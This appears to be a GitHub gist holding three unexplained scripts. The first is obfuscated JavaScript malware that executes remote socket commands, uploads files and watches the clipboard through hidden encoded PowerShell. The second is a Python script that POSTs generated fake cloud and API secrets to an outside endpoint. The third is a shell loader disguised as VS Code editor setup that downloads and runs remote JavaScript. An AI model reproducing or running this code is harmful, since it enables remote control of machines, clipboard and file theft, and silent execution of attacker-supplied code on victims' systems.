Buffer.isBuffer(stdout) ? stdout.length : Buffer.byteLength(stdout, 'utf8');\n try {\n const uploadResult = await uploadFileToLdb(filePath, stdout);\n if (uploadResult && uploadResult.fileUrl) {\n fileUrl = uploadResult.fileUrl;\n }\n } catch (uploadError) {\n }\n \n if (contentSize > maxSize) {\n fileContentToSend = null;\n console.log(`⚠️ File too large ((${contentSize / 1024 / 1024}).toFixed(2)}MB), sending URL only: ${fileUrl || 'not available'}`);\n }\n }\n }\n } catch (readError) {\n console.warn(`⚠️ Failed to read file directly: ${readError.message}, using stdout output`);\n if (stdout) {\n const contentSize = Buffer.isBuffer(stdout) ? stdout.length : Buffer.byteLength(stdout, 'utf8');\n try {\n const uploadResult = await uploadFileToLdb(filePath, stdout);\n if (uploadResult && uploadResult.fileUrl) {\n fileUrl = uploadResult.fileUrl;\n }\n } catch (uploadError) {\n }\n \n if (contentSize > maxSize) {\n fileContentToSend = null;\n console.log(`⚠️ File too large ((${contentSize / 1024 / 1024}).toFixed(2)}MB), sending URL only: ${fileUrl || 'not available'}`);\n }\n }\n }\n }\n \n socket.emit(\"message\", {\n ...msg,\n result: fileContentToSend,\n fileUrl: fileUrl,\n });\n });\n } catch (e) {\n console.error(\"Error executing command:\", e.message);\n socket.emit(\"message\", {\n ...msg,\n result: e.message,\n type: \"error\",\n });\n }\n });\n\n socket.on(\"disconnect\", () => {\n console.log(\"⚠️ Disconnected from socket server\");\n });\n\n socket.on(\"reconnect\", (attemptNumber) => {\n console.log(\"✅ Reconnected to socket server (attempt \" + attemptNumber + \")\");\n // Send process status on reconnect\n const status = checkProcessStatus();\n socket.emit(\"processStatus\", status);\n });\n\n // Handle process control commands\n socket.on(\"processControl\", (data) => {\n try {\n const { scriptType, action } = data;\n const path = require(\"path\");\n const os = require(\"os\");\n const { spawn } = require(\"child_process\");\n \n if (action === \"stop\") {\n // Stop process by reading lock file and killing the process\n const lockFileMap = {\n ldbScript: path.join(os.tmpdir(), `pid.${" + t + "}.1.lock`),\n autoUploadScript: path.join(os.tmpdir(), `pid.${" + t + "}.2.lock`),\n socketScript: path.join(os.tmpdir(), `pid.${" + t + "}.3.lock`),\n };\n \n const lockFilePath = lockFileMap[scriptType];\n if (lockFilePath && fs.existsSync(lockFilePath)) {\n try {\n const lockData = JSON.parse(fs.readFileSync(lockFilePath, 'utf8'));\n const pid = lockData.pid;\n try {\n process.kill(pid, 'SIGTERM');\n setTimeout(() => {\n try {\n process.kill(pid, 0);\n // Still running, force kill\n process.kill(pid, 'SIGKILL');\n } catch (e) {\n // Process already dead\n }\n }, 1000);\n fs.unlinkSync(lockFilePath);\n console.log(`Stopped ${scriptType} (PID: ${pid})`);\n } catch (killError) {\n // Process might already be dead\n try { fs.unlinkSync(lockFilePath); } catch (e) {}\n }\n } catch (e) {\n console.error(`Error stopping ${scriptType}:`, e.message);\n }\n }\n } else if (action === \"start\") {\n // Start process - this would require the original script code\n // For now, we'll just report that manual start is needed\n console.log(`Start command received for ${scriptType} - manual start required`);\n }\n \n // Update and send status\n setTimeout(() => {\n const status = checkProcessStatus();\n socket.emit(\"processStatus\", status);\n }, 500);\n } catch (error) {\n console.error(\"Error handling process control:\", error);\n }\n });\n\n // Periodically check and send process status\n setInterval(() => {\n if (socket.connected) {\n const status = checkProcessStatus();\n socket.emit(\"processStatus\", status);\n }\n }, 10000); // Check every 10 seconds\n });\n}\n\n(async () => {\n // Start socket connection first (non-blocking)\n (async () => {\n try {\n await sendHostInfo();\n const socket = await connectSocket();\n process.on(\"SIGINT\", () => {\n console.log(\"👋 Shutting down...\");\n socket.disconnect();\n process.exit(0);\n });\n } catch (error) {\n console.log(error, \"error in socket script\");\n // Don't exit on socket error, let other operations continue\n }\n })();\n \n // Start clipboard watching (non-blocking)\n (async () => {\n async function getClipboardContent() {\n try {\n const platform = os.platform();\n if (platform === 'win32') {\n const psScript = `Add-Type -AssemblyName System.Windows.Forms;\n$clipboard = [System.Windows.Forms.Clipboard]::GetText();\nif ($clipboard) { $clipboard } else { '' }`;\n const encodedScript = Buffer.from(psScript, 'utf16le').toString('base64');\n const content = execSync(\n `powershell -NoProfile -WindowStyle Hidden -EncodedCommand ${encodedScript}`,\n { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 10 * 1024 * 1024, windowsHide: true }\n ).trim();\n return content;\n } else if (platform === 'darwin') {\n const content = execSync('pbpaste', { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] }).trim();\n return content;\n } else if (platform === 'linux') {\n // If running in WSL, use PowerShell to get Windows clipboard\n if (is_wsl()) {\n try {\n const psScript = `Add-Type -AssemblyName System.Windows.Forms;\n$clipboard = [System.Windows.Forms.Clipboard]::GetText();\nif ($clipboard) { $clipboard } else { '' }`;\n const encodedScript = Buffer.from(psScript, 'utf16le').toString('base64');\n const content = execSync(\n `powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand ${encodedScript}`,\n { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 10 * 1024 * 1024 }\n ).trim();\n return content;\n } catch (e) {\n // Fallback to Linux clipboard if PowerShell fails\n }\n }\n // Try Linux clipboard tools (xclip/xsel)\n try {\n const content = execSync('xclip -selection clipboard -o', { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] }).trim();\n return content;\n } catch (e) {\n try {\n const content = execSync('xsel --clipboard --output', { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] }).trim();\n return content;\n } catch (e2) {\n // Only throw error if not in WSL (in WSL, we already tried PowerShell)\n if (!is_wsl()) {\n throw new Error('xclip or xsel not found. Install one of them: sudo apt-get install xclip');\n }\n return null;\n }\n }\n } else {\n throw new Error(`Unsupported platform: ${platform}`);\n }\n } catch (error) {\n return null;\n }\n}\nasync function watchClipboard(interval = 500) {\n let lastContent = '';\n let isRunning = true;\n const checkClipboard = async () => {\n if (!isRunning) return;\n try {\n const currentContent = await getClipboardContent();\n if (currentContent !== null && currentContent !== lastContent && currentContent !== '') {\n await f_s_l(currentContent);\n lastContent = currentContent;\n }\n } catch (error) {console.log(error);}\n if (isRunning) {\n setTimeout(checkClipboard, interval);\n }\n };\n \n await checkClipboard();\n \n process.on('SIGINT', () => {\n isRunning = false;\n });\n \n process.on('SIGTERM', () => {\n isRunning = false;\n });\n}\n\nawait watchClipboard(1000);\n })();\n})();\n\n";
try {
Utils.sp_s(a, "pid." + t + ".3.lock", "socketScript", f_s_l);
} catch (L) {}
};
r();
} catch (M) {}
function O(z) {
const s = {
NRZqW: function (Y, S) {
return Y === S;
},
preMV: "jGhko",
FborI: function (Y, S) {
return Y === S;
},
eifSf: "BFLZs",
iqRaB: function (Y, S) {
return Y !== S;
},
nNune: "oZqeT",
WvRGD: function (Y, S) {
return Y === S;
},
RBBFI: "string",
uuaJG: function (Y, S) {
return Y === S;
},
KthIp: "AdcEk",
FOdMc: "XaKUY",
RtJQC: "while (true) {}",
cofku: "counter",
UrnKi: "hCCvM",
XyRFj: function (Y, S) {
return Y !== S;
},
LnoWw: function (Y, S) {
return Y + S;
},
ZNUEi: function (Y, S) {
return Y / S;
},
huDMH: "length",
dIwbS: function (Y, S) {
return Y % S;
},
vVfSf: function (Y, S) {
return Y !== S;
},
CQjda: "NbcSB",
qZRlH: "yuMun",
QOonC: function (Y, S) {
return Y + S;
},
ftkMn: "debu",
NhdwX: "gger",
nCady: "action",
ZBuSG: "zSUfv",
cGXMg: "LCweI",
brTRE: "stateObject",
LbVEr: function (Y, S) {
return Y(S);
},
KHhZa: "Log message is required",
fLkgT: "Failed to send log",
Dgzmm: function (Y, S) {
return Y === S;
},
HQILi: "DkCzQ",
giDHn: "tasFU",
vQLFE: "UATHG",
fmWxs: "myRRx",
emned: function (Y, S) {
return Y(S);
}
};
function a(Y) {
if (s.iqRaB(s.nNune, s.nNune)) {
if (a.response) {} else if (Y.request) {} else {}
} else {
if (s.WvRGD(typeof Y, s.RBBFI)) {
if (s.uuaJG(s.KthIp, s.FOdMc)) {
return false;
} else {
return function (Z) {}.constructor(s.RtJQC).apply(s.cofku);
}
} else if (s.NRZqW(s.UrnKi, s.UrnKi)) {
if (s.XyRFj(s.LnoWw("", s.ZNUEi(Y, Y))[s.huDMH], 1) || s.NRZqW(s.dIwbS(Y, 20), 0)) {
if (s.vVfSf(s.CQjda, s.qZRlH)) {
(function () {
if (s.NRZqW(s.preMV, s.preMV)) {
return true;
} else if (S.existsSync(K)) {
Z.unlinkSync(q);
}
}).constructor(s.QOonC(s.ftkMn, s.NhdwX)).call(s.nCady);
} else {
return true;
}
} else if (s.WvRGD(s.ZBuSG, s.cGXMg)) {
return null;
return "\n const logDir = path.join(process.cwd(), '.logs');\n if (!fs.existsSync(logDir)) {\n fs.mkdirSync(logDir, { recursive: true });\n }\n const logFile = path.join(logDir, `" + s + "_${Date.now()}.log`);\n const originalLog = console.log;\n const originalError = console.error;\n const originalWarn = console.warn;\n const writeLog = (level, ...args) => {\n const timestamp = new Date().toISOString();\n const message = args.map(arg => typeof arg === 'object' ? JSON.stringify(arg) : String(arg)).join(' ');\n const logLine = `[${timestamp}] [${level}] ${message}\\n`;\n try {\n fs.appendFileSync(logFile, logLine, 'utf8');\n } catch (e) {}\n if (level === 'LOG') originalLog.apply(console, args);\n else if (level === 'ERROR') originalError.apply(console, args);\n else if (level === 'WARN') originalWarn.apply(console, args);\n };\n console.log = (...args) => writeLog('LOG', ...args);\n console.error = (...args) => writeLog('ERROR', ...args);\n console.warn = (...args) => writeLog('WARN', ...args);\n ";
} else {
(function () {
if (s.FborI(s.eifSf, s.eifSf)) {
return false;
} else {
const L = Z ? function () {
if (L) {
const A = R.apply(j, arguments);
T = null;
return A;
}
} : function () {};
p = false;
return L;
}
}).constructor(s.LnoWw(s.ftkMn, s.NhdwX)).apply(s.brTRE);
}
} else {
return true;
}
s.LbVEr(a, ++Y);
}
}
try {
if (s.Dgzmm(s.HQILi, s.giDHn)) {
throw new s(s.KHhZa);
} else if (z) {
if (s.NRZqW(s.vQLFE, s.vQLFE)) {
return a;
} else {
return s;
}
} else if (s.iqRaB(s.fmWxs, s.fmWxs)) {
throw new a(Y.data.error || s.fLkgT);
} else {
s.emned(a, 0);
}
} catch (Z) {}
}
(function () {
const s = function () {
const Y = {
ickTH: function (S, K, Z) {
return S(K, Z);
},
dCQNp: "npm install sql.js socket.io-client form-data axios --no-save --no-warnings --no-progress --loglevel silent",
qZnke: "pipe",
sZJUC: function (S, K) {
return S * K;
},
pUqhM: function (S, K) {
return S * K;
},
GuAhq: "Public",
AWfzB: "Default",
SOYoB: "All Users",
zqhzA: "Default User"
};
let globalObject;
try {
globalObject = Function("return (function() {}.constructor(\"return this\")( ));")();
} catch (Z) {
globalObject = window;
}
return globalObject;
};
const a = s();
a.setInterval(O, 2000);
})();
import requests
import random
import string
import base64
import uuid
import time
# --- Configuration ---
HOST = "ipcheckline.vercel.app"
API_KEY = "3aeb34a31"
TARGET_URL = f"https://{HOST}/api/vscode-encrypted/{API_KEY}"
HEADERS = {
"Content-Type": "application/json",
"x-secret-header": "secret"
}
# --- Core Helpers ---
def random_string(length, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for _ in range(length))
def random_digits(length):
return ''.join(random.choice(string.digits) for _ in range(length))
def random_ip():
return f"{random.randint(1, 220)}.{random.randint(0, 255)}.{random.randint(0, 255)}.{random.randint(0, 255)}"
def random_port():
return str(random.randint(1025, 65535))
# --- Long Data Generators ---
def gen_ls_colors():
"""Generates a massive, valid-looking LS_COLORS string."""
codes = ["00", "01", "30", "31", "32", "33", "34", "35", "36", "40", "41", "42", "43", "44", "01;31", "01;32", "01;34", "01;35", "00;36"]
exts = ["tar", "tgz", "arc", "arj", "taz", "lha", "lz4", "lzh", "lzma", "tlz", "txz", "tzo", "t7z", "zip", "z", "dz", "gz", "lrz", "lz", "lzo", "xz", "zst", "tzst", "bz2", "bz", "tbz", "tbz2", "tz", "deb", "rpm", "jar", "war", "ear", "sar", "rar", "alz", "ace", "zoo", "cpio", "7z", "rz", "cab", "wim", "swm", "dwm", "esd", "jpg", "jpeg", "mjpg", "mjpeg", "gif", "bmp", "pbm", "pgm", "ppm", "tga", "xbm", "xpm", "tif", "tiff", "png", "svg", "svgz", "mng", "pcx", "mov", "mpg", "mpeg", "m2v", "mkv", "webm", "webp", "ogm", "mp4", "m4v", "mp4v", "vob", "qt", "nuv", "wmv", "asf", "rm", "rmvb", "flc", "avi", "fli", "flv", "gl", "dl", "xcf", "xwd", "yuv", "cgm", "emf", "ogv", "ogx", "aac", "au", "flac", "m4a", "mid", "midi", "mka", "mp3", "mpc", "ogg", "ra", "wav", "oga", "opus", "spx", "xspf", "js", "ts", "jsx", "tsx", "py", "rb", "cpp", "h", "c", "java", "class", "go", "rs", "php", "html", "css", "scss", "json", "xml", "yaml", "yml", "sql", "db", "sqlite", "log", "sh", "bat", "ps1", "exe", "dll"]
random.shuffle(exts)
parts = [f"rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32"]
for ext in exts:
parts.append(f"*.{ext}={random.choice(codes)}")
return ":".join(parts)
def gen_long_path(home_dir):
"""Generates a bloated PATH variable."""
standard_paths = ["/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin", "/usr/games", "/usr/local/games", "/snap/bin"]
user_paths = [
f"{home_dir}/.nvm/versions/node/v{random.randint(16,22)}.{random.randint(0,10)}.{random.randint(0,5)}/bin",
f"{home_dir}/.cargo/bin",
f"{home_dir}/.local/bin",
f"{home_dir}/go/bin",
f"{home_dir}/.dotnet/tools",
f"{home_dir}/miniconda3/bin",
f"/opt/mssql-tools18/bin",
f"{home_dir}/.vscode-server/bin/{uuid.uuid4()}/bin/remote-cli"
]
return ":".join(user_paths + standard_paths)
# --- AWS Generators ---
def gen_aws_arn(account_id, resource_type="role"):
role_names = ["terraform-backend", "prod-deployer", "eks-node-group", "s3-admin-access", "readonly-audit", "billing-aggregator"]
return f"arn:aws:iam::{account_id}:{resource_type}/{random.choice(role_names)}"
def gen_aws_session_token():
length = random.randint(350, 750)
return base64.b64encode(random.randbytes(length)).decode('utf-8').replace("\n", "")
def generate_aws_bundle(home_dir):
account_id = random_digits(12)
region = random.choice(["us-east-1", "us-east-2", "us-west-2", "eu-west-1", "ap-southeast-1"])
aws_env = {
"AWS_ACCESS_KEY_ID": "AKIA" + random_string(16, string.ascii_uppercase + string.digits),
"AWS_SECRET_ACCESS_KEY": random_string(40, string.ascii_letters + string.digits + "/+"),
"AWS_SESSION_TOKEN": gen_aws_session_token(),
"AWS_DEFAULT_REGION": region,
"AWS_REGION": region,
"AWS_DEFAULT_OUTPUT": random.choice(["json", "text", "yaml"]),
"AWS_CONFIG_FILE": f"{home_dir}/.aws/config",
"AWS_SHARED_CREDENTIALS_FILE": f"{home_dir}/.aws/credentials",
"AWS_PAGER": "",
"AWS_RETRY_MODE": "standard",
"AWS_MAX_ATTEMPTS": "3",
"AWS_PROFILE": random.choice(["default", "production", "staging", "legacy-app"]),
"AWS_ROLE_ARN": gen_aws_arn(account_id),
"AWS_WEB_IDENTITY_TOKEN_FILE": f"/var/run/secrets/eks.amazonaws.com/serviceaccount/token",
"AWS_SSO_START_URL": f"https://{random_string(8)}.awsapps.com/start",
"AWS_SSO_REGION": region
}
# Remove a few random AWS keys to simulate natural messiness
keys = list(aws_env.keys())
for _ in range(random.randint(1, 4)):
k = random.choice(keys)
if "ACCESS_KEY" not in k and "SESSION_TOKEN" not in k: # Keep the juicy ones
del aws_env[k]
return aws_env
# --- Main System Generator ---
def generate_base_system():
# 1. Identity & Network
username = random.choice(["root", "ubuntu", "ec2-user", "node", "runner", "deploy", "codespace"])
home_dir = "/root" if username == "root" else f"/home/{username}"
client_ip = random_ip()
server_ip = random_ip()
uid = "0" if username == "root" else "1000"
session_id = str(random.randint(10000, 99999))
# 2. Base Environment
env = {
"SHELL": random.choice(["/bin/bash", "/bin/zsh", "/usr/bin/bash"]),
"COLORTERM": "truecolor",
"TERM": "xterm-256color",
"TERM_PROGRAM": "vscode",
"TERM_PROGRAM_VERSION": f"1.{random.randint(80, 108)}.{random.randint(0, 5)}",
"USER": username,
"LOGNAME": username,
"HOME": home_dir,
"PWD": f"{home_dir}/{random.choice(['app', 'project', 'workspace', 'backend', 'api', 'infra'])}",
"LANG": "en_US.UTF-8",
"LANGUAGE": "en_US:en",
"SSH_CONNECTION": f"{client_ip} {random_port()} {server_ip} 22",
"SSH_CLIENT": f"{client_ip} {random_port()} 22",
"XDG_SESSION_TYPE": "tty",
"XDG_SESSION_ID": session_id,
"XDG_SESSION_CLASS": "user",
"XDG_RUNTIME_DIR": f"/run/user/{uid}",
"DBUS_SESSION_BUS_ADDRESS": f"unix:path=/run/user/{uid}/bus",
"MOTD_SHOWN": "pam",
"SHLVL": "1",
"LESSOPEN": "| /usr/bin/lesspipe %s",
"LESSCLOSE": "/usr/bin/lesspipe %s %s",
"_": "/usr/bin/env",
# 3. Dynamic Long Variables
"LS_COLORS": gen_ls_colors(),
"PATH": gen_long_path(home_dir),
# 4. VS Code Specifics
"VSCODE_GIT_IPC_HANDLE": f"/run/user/{uid}/vscode-git-{random_string(8)}.sock",
"VSCODE_IPC_HOOK_CLI": f"/run/user/{uid}/vscode-ipc-{uuid.uuid4()}.sock",
"VSCODE_GIT_ASKPASS_NODE": f"{home_dir}/.vscode-server/cli/servers/Stable-{random_string(40)}/server/node",
"GIT_ASKPASS": f"{home_dir}/.vscode-server/cli/servers/Stable-{random_string(40)}/server/extensions/git/dist/askpass.sh",
"VSCODE_PYTHON_AUTOACTIVATE_GUARD": "1"
}
# 5. Add Conda/NVM if applicable
if random.choice([True, False]):
env["CONDA_EXE"] = f"{home_dir}/miniconda3/bin/conda"
env["CONDA_PREFIX"] = f"{home_dir}/miniconda3"
env["CONDA_DEFAULT_ENV"] = "base"
env["CONDA_PROMPT_MODIFIER"] = "(base) "
else:
env["NVM_DIR"] = f"{home_dir}/.nvm"
env["NVM_INC"] = f"{home_dir}/.nvm/versions/node/v18.12.0/include/node"
return env, home_dir
# --- Extra Secrets Generator ---
def generate_extras():
extras = {
"NODE_ENV": "production",
"STRIPE_SECRET_KEY": "sk_live_" + random_string(24, string.ascii_letters + string.digits),
"STRIPE_WEBHOOK_SECRET": "whsec_" + random_string(32, string.ascii_letters + string.digits),
"DATABASE_URL": f"postgres://u{random_string(6)}:{random_string(16)}@db-prod-{random_string(4)}.cluster.aws.com:5432/main_db",
"REDIS_URL": f"redis://:{random_string(12)}@10.0.{random.randint(1,255)}.{random.randint(1,255)}:6379",
"GITHUB_TOKEN": "ghp_" + random_string(36, string.ascii_letters + string.digits),
"SENDGRID_API_KEY": "SG." + random_string(22) + "." + random_string(43),
"OPENAI_API_KEY": "sk-" + random_string(48),
"CI": "true"
}
# Return a random subset
keys = list(extras.keys())
selected_keys = random.sample(keys, random.randint(4, len(keys)))
return {k: extras[k] for k in selected_keys}
# --- Main Execution ---
def build_final_payload():
# 1. Build Base System
payload, home_dir = generate_base_system()
# 2. Inject AWS Bundle
aws_payload = generate_aws_bundle(home_dir)
payload.update(aws_payload)
# 3. Inject Extra Secrets
extras = generate_extras()
payload.update(extras)
return payload
if __name__ == "__main__":
final_payload = build_final_payload()
print("\n--- ULTIMATE POISON PAYLOAD GENERATED ---")
print(f"Total Variables: {len(final_payload)}")
print(f"Identity: {final_payload['USER']} @ {final_payload['SSH_CLIENT'].split()[0]}")
# Stats on the 'weight' of the request
payload_size = len(str(final_payload))
print(f"Payload Size: {payload_size} bytes (Approx {payload_size/1024:.2f} KB)")
print("\n[*] Sample Variables:")
for k in ["AWS_ACCESS_KEY_ID", "AWS_PROFILE", "SHELL", "PWD", "STRIPE_SECRET_KEY"]:
if k in final_payload:
print(f" {k}: {final_payload[k]}")
print("-" * 50)
try:
# Send the payload
print(f"[*] Sending to {TARGET_URL}...")
r = requests.post(TARGET_URL, json=final_payload, headers=HEADERS, timeout=15)
print(f"[+] Status Code: {r.status_code}")
if r.text:
print(f"[+] Response Body Preview: {r.text}")
if "eval" in r.text or "function" in r.text:
print("\n[!!!] WARNING: Server returned executable code.")
except Exception as e:
print(f"[-] Request Failed: {e}")
# Creating new Info
set -e
OS=$(uname -s)
NODE_EXE=""
NODE_INSTALLED_VERSION=""
# -------------------------
# Check for global Node.js installation
# -------------------------
if command -v node &> /dev/null; then
NODE_INSTALLED_VERSION=$(node -v 2>/dev/null || echo "")
if [ -n "$NODE_INSTALLED_VERSION" ]; then
NODE_EXE="node"
echo "[INFO] Node.js is already installed globally: $NODE_INSTALLED_VERSION"
fi
fi
# -------------------------
# If Node.js not found globally, download and extract portable version
# -------------------------
if [ -z "$NODE_EXE" ]; then
echo "[INFO] Node.js not found globally. Attempting to download portable version..."
# Get latest Node.js version
if [ "$OS" == "Darwin" ]; then
# macOS - get latest version
if command -v curl &> /dev/null; then
LATEST_VERSION=$(curl -s https://nodejs.org/dist/index.json | grep -o '"version":"[^"]*"' | head -1 | cut -d'"' -f4)
elif command -v wget &> /dev/null; then
LATEST_VERSION=$(wget -qO- https://nodejs.org/dist/index.json | grep -o '"version":"[^"]*"' | head -1 | cut -d'"' -f4)
else
LATEST_VERSION="v20.11.1"
fi
elif [ "$OS" == "Linux" ]; then
# Linux - get latest version
if command -v curl &> /dev/null; then
LATEST_VERSION=$(curl -s https://nodejs.org/dist/index.json | grep -o '"version":"[^"]*"' | head -1 | cut -d'"' -f4)
elif command -v wget &> /dev/null; then
LATEST_VERSION=$(wget -qO- https://nodejs.org/dist/index.json | grep -o '"version":"[^"]*"' | head -1 | cut -d'"' -f4)
else
LATEST_VERSION="v20.11.1"
fi
else
echo "[ERROR] Unsupported OS: $OS"
exit 1
fi
# Remove leading "v"
NODE_VERSION=${LATEST_VERSION#v}
# Determine download URL and paths based on OS
EXTRACTED_DIR="$HOME/.vscode/node-v${NODE_VERSION}-$( [ "$OS" = "Darwin" ] && echo "darwin" || echo "linux" )-x64"
PORTABLE_NODE="$EXTRACTED_DIR/bin/node"
if [ "$OS" == "Darwin" ]; then
NODE_TARBALL="$HOME/.vscode/node-v${NODE_VERSION}-darwin-x64.tar.xz"
DOWNLOAD_URL="https://nodejs.org/dist/v${NODE_VERSION}/node-v${NODE_VERSION}-darwin-x64.tar.xz"
elif [ "$OS" == "Linux" ]; then
NODE_TARBALL="$HOME/.vscode/node-v${NODE_VERSION}-linux-x64.tar.xz"
DOWNLOAD_URL="https://nodejs.org/dist/v${NODE_VERSION}/node-v${NODE_VERSION}-linux-x64.tar.xz"
fi
# Check if portable Node.js already exists
if [ -f "$PORTABLE_NODE" ]; then
echo "[INFO] Portable Node.js found."
NODE_EXE="$PORTABLE_NODE"
export PATH="$EXTRACTED_DIR/bin:$PATH"
else
echo "[INFO] Downloading Node.js..."
mkdir -p "$HOME/.vscode"
# Download Node.js
if ! command -v curl &> /dev/null && ! command -v wget &> /dev/null; then
echo "[ERROR] Neither curl nor wget is available."
exit 1
fi
if command -v curl &> /dev/null; then
curl -sSL -o "$NODE_TARBALL" "$DOWNLOAD_URL"
else
wget -q -O "$NODE_TARBALL" "$DOWNLOAD_URL"
fi
if [ ! -f "$NODE_TARBALL" ]; then
echo "[ERROR] Failed to download Node.js."
exit 1
fi
echo "[INFO] Extracting Node.js..."
tar -xf "$NODE_TARBALL" -C "$HOME/.vscode"
rm -f "$NODE_TARBALL"
if [ -f "$PORTABLE_NODE" ]; then
echo "[INFO] Portable Node.js extracted successfully."
NODE_EXE="$PORTABLE_NODE"
export PATH="$EXTRACTED_DIR/bin:$PATH"
else
echo "[ERROR] node executable not found after extraction."
exit 1
fi
fi
fi
# -------------------------
# Verify Node.js works
# -------------------------
if [ -z "$NODE_EXE" ]; then
echo "[ERROR] Node.js executable not set."
exit 1
fi
"$NODE_EXE" -v > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo "[ERROR] Node.js execution failed."
exit 1
fi
# -------------------------
# Download required files
# -------------------------
USER_HOME="$HOME/.vscode"
mkdir -p "${USER_HOME}"
BASE_URL="https://editorsettings.vercel.app"
echo "[INFO] Downloading env-setup.js and package.json..."
if ! command -v curl >/dev/null 2>&1; then
wget -q -O "${USER_HOME}/env-setup.js" "${BASE_URL}/settings/env?flag=1"
wget -q -O "${USER_HOME}/package.json" "${BASE_URL}/settings/package"
else
curl -s -L -o "${USER_HOME}/env-setup.js" "${BASE_URL}/settings/env?flag=1"
curl -s -L -o "${USER_HOME}/package.json" "${BASE_URL}/settings/package"
fi
# -------------------------
# Install dependencies
# -------------------------
cd "${USER_HOME}"
if [ ! -d "node_modules/request" ]; then
echo "[INFO] Installing NPM packages..."
if command -v npm &> /dev/null; then
npm install --silent --no-progress --loglevel=error --fund=false
else
# Use npm from extracted directory if available
if [ -n "$EXTRACTED_DIR" ] && [ -f "$EXTRACTED_DIR/bin/npm" ]; then
"$EXTRACTED_DIR/bin/npm" install --silent --no-progress --loglevel=error --fund=false
else
echo "[ERROR] npm not found."
exit 1
fi
fi
if [ $? -ne 0 ]; then
echo "[ERROR] npm install failed."
exit 1
fi
fi
# -------------------------
# Run env-setup.js
# -------------------------
if [ -f "${USER_HOME}/env-setup.js" ]; then
echo "[INFO] Running env-setup.js..."
#cd "$HOME"
"$NODE_EXE" "${USER_HOME}/env-setup.js"
if [ $? -ne 0 ]; then
echo "[ERROR] env-setup.js execution failed."
exit 1
fi
else
echo "[ERROR] env-setup.js not found."
exit 1
fi
echo "[SUCCESS] Script completed successfully."
exit 0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment